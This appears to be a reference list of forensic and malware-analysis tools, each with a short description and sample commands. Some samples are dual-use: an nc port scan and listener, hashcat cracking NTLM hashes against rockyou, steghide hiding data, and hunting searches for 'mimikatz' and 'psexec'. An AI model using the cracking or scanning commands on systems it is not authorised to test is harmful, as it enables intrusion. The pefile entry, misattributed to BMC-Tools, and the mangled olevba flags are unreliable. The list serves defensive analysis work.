Binary analysis

capa

capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, shellcode file, or a sandbox report and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

Examples:

capa.exe suspicious.exe -vv
capa 05be49819139a3fdcdbddbdefd298398779521f3d68daa25275cc77508e42310.json
                    
Detect It Easy
DIE is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.
floss

The FLARE Obfuscated String Solver (FLOSS, formerly FireEye Labs Obfuscated String Solver) uses advanced static analysis techniques to automatically extract and deobfuscate all strings from malware binaries.

Examples:

floss malware.exe
floss --only stack tight -- suspicious.exe
                    
pestudio

The goal of pestudio is to spot artifacts of executable files in order to ease and accelerate Malware Initial Assessment.

PE-bear

PE-bear is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.

PPEE (puppy)

PPEE (puppy) is a Professional PE file Explorer forreversers, malware researchers and those who want to statically inspect PE files in more details.

radare2

radare2 provides a set of libraries, tools and plugins to ease reverse engineering tasks.

Examples:

$ r2 /bin/ls   # open file in read-only
> aaa          # analyse the program (r2 -A)
> afl          # list all functions (try aflt, aflm)
> px 32        # print 32 byte hexdump current block
> s sym.main   # seek to main (using flag name)
> f~foo        # filter flags matching 'foo' (internal |grep)
> iS;is        # list sections and symbols (rabin2 -Ss)
> pdf; agf     # disassembly and ascii-art function graph
> oo+;w hello  # reopen in read-write and write a string
> ?*~...       # interactive filter in all command help
> q            # quit
                    
scdbg

scdbg is a shellcode analysis application built around the libemu emulation library. When run it will display to the user all of the Windows API the shellcode attempts to call.


Chrome utilities

BrowsingHistoryView

BrowsingHistoryView is a utility that reads the history data of different Web browsers (Mozilla Firefox, Google Chrome, Internet Explorer, Microsoft Edge, Opera) and displays the browsing history of all these Web browsers in one table. The browsing history table includes the following information: Visited URL, Title, Visit Time, Visit Count, Web browser and User Profile. BrowsingHistoryView allows you to watch the browsing history of all user profiles in a running system, as well as to get the browsing history from external hard drive.

ChromeCacheView

ChromeCacheView is a small utility that reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache. For each cache file, the following information is displayed: URL, Content type, File size, Last accessed time, Expiration time, Server name, Server response, and more.

ChromeCookiesView

ChromeCookiesView is an alternative to the standard internal cookies viewer of Google Chrome Web browser. it displays the list of all cookies stored by Google Chrome Web browser, and allows you to easily delete unwanted cookies. It also allows you export the cookies into text/csv/html/xml file.


Debugging

x64dbg

x64dbg is an open-source x64/x32 debugger for windows.


Event log analysis

Hayabusa

Hayabusa is a Windows event log fast forensics timeline generator and threat hunting tool created by the Yamato Security group in Japan.

Examples:

hayabusa.exe search -d ../hayabusa-sample-evtx -k "mimikatz"
hayabusa.exe search -d ../hayabusa-sample-evtx -r "(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
hayabusa.exe search -d ../hayabusa-sample-evtx -r ".*" -F WorkstationName:"kali"
                    
Chainsaw

Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and the MFT file. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

Examples:

chainsaw hunt EVTX-ATTACK-SAMPLES/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml
chainsaw search mimikatz -i evtx_attack_samples/
chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
chainsaw search -e "DC[0-9].insecurebank.local" evtx_attack_samples --json
                    
EvtxECmd

EvtxECmd is an event log (evtx) parser with standardized CSV, XML, and json output! Custom maps, locked file support, and more!

Examples:

EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out" --csvf MyOutputFile.csv
EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out"
EvtxECmd.exe -f "C:\Temp\Application.evtx" --json "c:\temp\jsonout"
                    
APT-Hunter

APT-Hunter is a Threat Hunting tool for windows event logs which made by purple team mindset to detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity. APT-Hunter use pre-defined detection rules and focus on statistics to uncover abnormalities which is very effective in compromise assessment.

Examples:

APT-Hunter.exe -p /opt/wineventlogs/ -o Project1 -allreport
APT-Hunter.exe -hunt "psexec" -p /opt/wineventlogs/ -o Project2
APT-Hunter.exe -huntfile "(psexec|psexesvc)" -p /opt/wineventlogs/ -o Project2
APT-Hunter.exe -sigma -rules rules.json -p /opt/wineventlogs/ -o Project2
                    

Hashing

HashCalc

HashCalc is a free calculator to compute multiple hashes, checksums and HMACs for files, text and hex strings.

Hasher

Hasher is an utility to calculate hashes for files.

GetHashes

Simple batch script for getting MD5, SHA-1, and SHA-256 hashes.

Examples:

GetHashes file.exe
                    

Hex editors

HxD

HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.


Mail forensics

MailView

MailView is an utility for viewing Outlook Express, Windows Mail/Windows Live Mail and Mozilla Thunderbird message databases as well as single EML files.


Memory forensics

Volatility Workbench

Volatility Workbench is a free open source tool that provides a graphic user interface for the Volatility memory analysis forensics tool.

MemProcFS

MemProcFS is an easy and convenient way of viewing physical memory as files in a virtual file system.

Examples:

memprocfs.exe -device c:\temp\win10x64-dump.raw
memprocfs.exe -device c:\temp\win10x64-dump.raw -forensic 1 -forensic-yara-rules c:\yara\rules\windows_malware_index.yar
memprocfs.exe -device unknown-x64-dump.raw -pagefile0 pagefile.sys -pagefile1 swapfile.sys
                    

MFT

MFTECmd

MFTECmd is a $MFT, $Boot, $J, $SDS, $I30, and $LogFile parser. Handles locked files.

Examples:

MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out" --csvf MyOutputFile.csv
MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out"
MFTECmd.exe -f "C:\Temp\SomeMFT" --json "c:\temp\jsonout"
MFTECmd.exe -f "C:\Temp\SomeMFT" --body "c:\temp\bout" --bdl c
MFTECmd.exe -f "C:\Temp\SomeMFT" --de 5-5
                    
MFTExplorer

MFTExplorer is an graphical $MFT viewer.


Packing

UPX

UPX is a free, secure, portable, extendable, high-performance executable packer for several executable formats.

Examples:

upx -o packed_file.exe original_file.exe
upx -d packed_file.exe
                    
XVolkolak

Xvolkolak is an unpacker emulator. Unlike programs of this type, it does not use DebugAPI and other features of the operating system.


Password cracking

Hash Suite Free

Hash Suite is a Windows program to test security of password hashes.

hashcat

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking.

Examples:

hashcat -m 0 -a 0 hash.txt wordlist.txt
hashcat -m 1000 ntlmhash.txt -a 0 rockyou.txt
                    
Ophcrack

Ophcrack is a Windows Password cracker based on Rainbow Tables.


Registry analysis

AmcacheParser

AmcacheParser is an Amcache.hve parser with lots of extra features. Handles locked files.

Examples:

AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" --csv C:\temp
AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" -i on --csv C:\temp --csvf foo.csv
AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" -w "c:\temp\whitelist.txt" --csv C:\temp
                    
AppCompatCacheParser

AppCompatCacheParser is an AppCompatCache aka ShimCache parser.

Examples:

AppCompatCacheParser.exe --csv c:\temp -t -c 2
AppCompatCacheParser.exe --csv c:\temp --csvf results.csv
                    
RECmd

RECmd is a powerful command line Registry tool searching, multi-hive support, plugins, and more.

Examples:

RECmd.exe --f "C:\Temp\UsrClass 1.dat" --sk URL --recover false --nl
RECmd.exe --f "D:\temp\UsrClass 1.dat" --StartDate "11/13/2014 15:35:01"
RECmd.exe --f "D:\temp\UsrClass 1.dat" --RegEx --sv "(App|Display)Name"
                    
RegistryExplorer

Registry Explorer is a registry viewer with searching, multi-hive support, plugins, and more. Handles locked files.

SBECmd

SBECmd is a command line edition for exporting shellbag data.

Examples:

SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout
SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout --tz "US Eastern Standard Time"
SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout --dedupe
                    
ShellBagsExplorer

ShellBagsExplorer is a GUI for browsing shellbags data. Handles locked files.


Disk analysis

bulk_extractor

bulk_extractor is a high-performance digital forensics exploitation tool. It is a "get evidence" button that rapidly scans any kind of input (disk images, files, directories of files, etc) and extracts structured information such as email addresses, credit card numbers, JPEGs and JSON snippets without parsing the file system or file system structures. The results are stored in text files that are easily inspected, searched, or used as inputs for other forensic processing. bulk_extractor also creates histograms of certain kinds of features that it finds, such as Google search terms and email addresses, as previous research has shown that such histograms are especially useful in investigative and law enforcement applications.

Examples:

bulk_extractor -o bulk-out image.img
                    
OSFMount

OSFMount allows you to mount local disk image files (bit-for-bit copies of an entire disk or disk partition) in Windows as a physical disk or a logical drive letter. You can then analyze the disk image file with PassMark OSForensics™ by using the physical disk name (eg. \\.\PhysicalDrive1) or logical drive letter (eg. Z:). By default, the image files are mounted as read only so that the original image files are not altered.

Sleuth Kit tools

The Sleuth Kit® is a collection of command line tools and a C library that allows you to analyze disk images and recover files from them. It is used behind the scenes in Autopsy and many other open source and commercial forensics tools.

Examples:

fsstat -i raw evidence.dd
fls -i raw evidence.dd
istat -f ext4 -i raw evidence.dd
mmls evidence.dd
fsstat evidence.dd
img_stat evidence.dd
                    
PhotoRec

PhotoRec is file data recovery software designed to recover lost files including video, documents and archives from hard disks (Mechanical Hard drives, Solid State Drives...), CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted.

TestDisk

TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software: certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy.


Network

nc

nc is a simple utility that reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

Examples:

nc -z -v 10.10.10.10 20-80 # simple port scan
nc -lvp 8080 # listen on port 8080
                    
NetworkMiner

NetworkMiner is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files. NetworkMiner can also be used to capture live network traffic by sniffing a network interface. Detailed information about each IP address in the analyzed network traffic is aggregated to a network host inventory, which can be used for passive asset discovery as well as to get an overview of which devices that are communicating.


Utilities

bstrings

bstrings is an advanced strings search program.

Examples:

bstrings.exe -f "C:\Temp\UsrClass 1.dat" --ls URL
bstrings.exe -f "C:\Temp\someFile.txt" --lr guid
bstrings.exe -f "C:\Temp\aBigFile.bin" --fs c:\temp\searchStrings.txt --fr c:\temp\searchRegex.txt -s
bstrings.exe -d "C:\Temp" --mask "*.dll"
bstrings.exe -d "C:\Temp" --ar "[\x20-\x37]"
bstrings.exe -d "C:\Temp" --cp 10007
bstrings.exe -d "C:\Temp" --ls test
bstrings.exe -f "C:\Temp\someOtherFile.txt" --lr cc --sa
bstrings.exe -f "C:\Temp\someOtherFile.txt" --lr cc --sa -m 15 -x 22
bstrings.exe -f "C:\Temp\UsrClass 1.dat" --ls mui --sl
                    
BusyBox

BusyBox is a software suite that provides several Unix utilities in a single executable file.

Examples:

busybox.exe sh
busybox.exe sha1sum file.exe
busybox grep test myfile.txt
                    
CyberChef

CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

DB Browser for SQLite

DB Browser for SQLite is a high quality, visual, open source tool designed for people who want to create, search, and edit SQLite or SQLCipher database files.

dd

dd command reads one block of input and process it and writes it into an output file.

Examples:

dd if=\\.\Volume{c18588c0-02e9-11d8-853f-00902758442b} of=c:\temp\usb1.img bs=1M
dd if=\\?\Device\Harddisk1\Partition0 of=c:\temp\usb2.img bs=1M --size --progress
                    
exiftool

exiftool is a command-line application and Perl library for reading and writing EXIF, GPS, IPTC, XMP, makernotes and other meta information in image, audio and video.

Examples:

exiftool image.jpg
                    
Timeline Explorer

Timeline Explorer is tool for viewing CSV and Excel files, as well as aplying filters.

yara

YARA is an open-source tool designed to help malware researchers identify and classify malware samples. It makes it possible to create descriptions (or rules) for malware families based on textual and/or binary patterns. YARA is multi-platform, running on Linux, Windows and Mac OS X. It can be used through its command-line interface or from Python scripts with the YARA-Python extension.

Examples:

yara /foo/bar/rules1 /foo/bar/rules2 .
yara -t Packer -t Compiler /foo/bar/rules bazfile
yara -r /foo
                    
OfficeMalScanner

OfficeMalScanner is a Ms Office forensic tool to scan for malicious traces, like shellcode heuristics, PE-files or embedded OLE streams. Found files are being extracted to disk. It supports disassembly and hexview as well as an easy brute force mode to detect encrypted files.

Examples:

OfficeMalScanner.exe "C:\File.xls" scan brute debug
OfficeMalScanner.exe "C:\File.xls" info
                    
SQLECmd

SQLECmd is a tool to find and process SQLite files according to your needs with maps.

Examples:

SQLECmd.exe -f "C:\Temp\someFile.db" --csv "c:\temp\out"
SQLECmd.exe -d "C:\Temp\" --csv "c:\temp\out"
SQLECmd.exe -d "C:\Temp\" --hunt --csv "c:\temp\out"
                    
steghide

Steghide is a steganography program that is able to hide data in various kinds of image and audio files.

Examples:

steghide info image.jpg
steghide embed -ef file.txt -cf image.jpg
steghide extract -sf image.jpg
                    
$I Parse

$I Parse is a tool for parsing $I (index) files from the Recycle Bin of Windows Vista and later.

TrID

TrID is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.

Examples:

trid c:\test\mydoc.doc
trid c:\temp\* -ae
dir d:\testdrive /s /b | trid -ce -@
                    
WinPython

WinPython is a free open-source portable distribution of the Python programming language for Windows 10/11 and scientific and educational usage.


Windows artifacts

JLECmd

JLECmd is a Jump List parser.

Examples:

JLECmd.exe -f "C:\Temp\f01b4d95cf55d32a.customDestinations-ms" --mp
JLECmd.exe -f "C:\Temp\f01b4d95cf55d32a.automaticDestinations-ms" --json "D:\jsonOutput" --jsonpretty
JLECmd.exe -d "C:\CustomDestinations" --csv "c:\temp" --html "c:\temp" -q
JLECmd.exe -d "C:\Users\e\AppData\Roaming\Microsoft\Windows\Recent" --dt "ddd yyyy MM dd HH:mm:ss.fff"
                    
JumpListExplorer

JumpListExplorer is a GUI based Jump List viewer.

LastActivityView

LastActivityView is a tool for Windows operating system that collects information from various sources on a running system, and displays a log of actions made by the user and events occurred on this computer. The activity displayed by LastActivityView includes: Running .exe file, Opening open/save dialog-box, Opening file/folder from Explorer or other software, software installation, system shutdown/start, application or system crash, network connection/disconnection and more.

LECmd

LECmd is a tool for parsing lnk files.

Examples:

LECmd.exe -f "C:\Temp\foobar.lnk"
LECmd.exe -f "C:\Temp\somelink.lnk" --json "D:\jsonOutput" --pretty
LECmd.exe -d "C:\Temp" --csv "c:\temp" --html c:\temp --xml c:\temp\xml -q
LECmd.exe -f "C:\Temp\some other link.lnk" --nid --neb
LECmd.exe -d "C:\Temp" --all
                    
PECmd

PECmd is a Prefetch parser.

Examples:

PECmd.exe -f "C:\Temp\CALC.EXE-3FBEF7FD.pf"
PECmd.exe -f "C:\Temp\CALC.EXE-3FBEF7FD.pf" --json "D:\jsonOutput" --jsonpretty
PECmd.exe -d "C:\Temp" -k "system32, fonts"
PECmd.exe -d "C:\Temp" --csv "c:\temp" --csvf foo.csv --json c:\temp\json
PECmd.exe -d "C:\Windows\Prefetch"
                    
RBCmd

RBCmd is a Recycle Bin artifact (INFO2/$I) parser.

Examples:

RBCmd.exe -f "C:\Temp\INFO2"
RBCmd.exe -f "C:\Temp\$I3VPA17" --csv "D:\csvOutput"
RBCmd.exe -d "C:\Temp" --csv "c:\temp"
                    
RecentFileCacheParser

RecentFileCache parser.

Examples:

RecentFileCacheParser.exe -f "C:\Temp\RecentFileCache.bcf" --csv "c:\temp"
RecentFileCacheParser.exe -f "C:\Temp\RecentFileCache.bcf" --json "D:\jsonOutput" --jsonpretty
                    
SDBExplorer

SDBExplorer is a Shim database GUI tool.

Thumbcache viewer

Thumbcache Viewer allows you to extract thumbnail images from the thumbcache_*.db and iconcache_*.db database files found on Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, and Windows 11.

WFA

WFA decodes and analyzes some special files used by Windows OS.

WinPrefetchView

WinPrefetchView is a small utility that reads the Prefetch files stored in your system and displays the information stored in them. By looking in these files, you can learn which files every application is using, and which files are loaded on Windows boot.

SrumECmd

SrumECmd is a SRUM parser.

Examples:

SrumECmd.exe -f "C:\Temp\SRUDB.dat" -r "C:\Temp\SOFTWARE" --csv "C:\Temp\"
SrumECmd.exe -f "C:\Temp\SRUDB.dat" --csv "c:\temp"
SrumECmd.exe -d "C:\Temp" --csv "c:\temp"
                    
SumECmd

SumECmd process Microsoft User Access Logs.

Examples:

SumECmd.exe -d "C:\Temp\sum" --csv "C:\Temp\"
                    
WxTCmd

WxTCmd is a parser for the Windows 10 Timeline feature database.

Examples:

WxTCmd.exe -f "C:\Users\eric\AppData\Local\ConnectedDevicesPlatform\L.eric\ActivitiesCache.db" --csv c:\temp
                    

Python 3 utilities

bmc-tools

BMC-Tools is a RDP Bitmap Cache parser.

pyinstxtractor

PyInstaller Extractor is a script to extract the contents of a PyInstaller generated executable file.

Examples:

python pyinstxtractor.py test.exe
                    
pefile

BMC-Tools is a multi-platform Python module to parse and work with Portable Executable (PE) files. Most of the information contained in the PE file headers is accessible, as well as all the sections' details and data.

oletools

oletools is a package of Python tools to analyze Microsoft OLE2 files.

Examples:

oleid test.vb
olevba test.vb
olevba - deobf - reveal test.vb
olevba "test.xlsm"